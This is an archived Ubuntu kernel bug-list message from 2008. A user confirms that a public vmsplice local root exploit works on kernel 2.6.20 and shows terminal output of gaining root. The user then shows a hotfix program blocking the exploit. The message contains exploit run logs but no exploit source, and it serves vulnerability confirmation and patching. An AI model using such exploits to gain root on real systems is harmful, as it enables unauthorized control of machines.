[Bug 190587] Re: Local root exploit in kernel 2.6.17 - 2.6.24 (vmsplice)
Yuri
ycsapo at mines.edu
Tue Feb 12 03:18:36 UTC 2008
Contrary to what I've been reading, I can confirm this on feisty, at
least with AMD processor:
ycsapo at pie:~$ grep "model name" /proc/cpuinfo
model name : Dual-Core AMD Opteron(tm) Processor 2218
model name : Dual-Core AMD Opteron(tm) Processor 2218
model name : Dual-Core AMD Opteron(tm) Processor 2218
model name : Dual-Core AMD Opteron(tm) Processor 2218
ycsapo at pie:~$ uname -a
Linux pie 2.6.20-16-generic #2 SMP Thu Jan 31 22:39:18 UTC 2008 x86_64 GNU/Linux
ycsapo at pie:~$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2ac0a9f0d000 .. 0x2ac0a9f3f000
[+] root
root at pie:~# whoami
root
root at pie:~#
I also confirm the suggested hotfix (disable-vmsplice-if-exploitable.c)
works:
ycsapo at pie:~$ cc disable-vmsplice-if-exploitable.c
ycsapo at pie:~$ ./a.out
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2acad5163000 .. 0x2acad5195000
[+] root
Exploit gone!
ycsapo at pie:~$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b010025b000 .. 0x2b010028d000
[-] vmsplice
ycsapo at pie:~$ whoami
ycsapo
--
Local root exploit in kernel 2.6.17 - 2.6.24 (vmsplice)
https://bugs.launchpad.net/bugs/190587
You received this bug notification because you are a member of Kernel
Bugs, which is a bug contact for linux-source-2.6.15 in ubuntu.
More information about the kernel-bugs
mailing list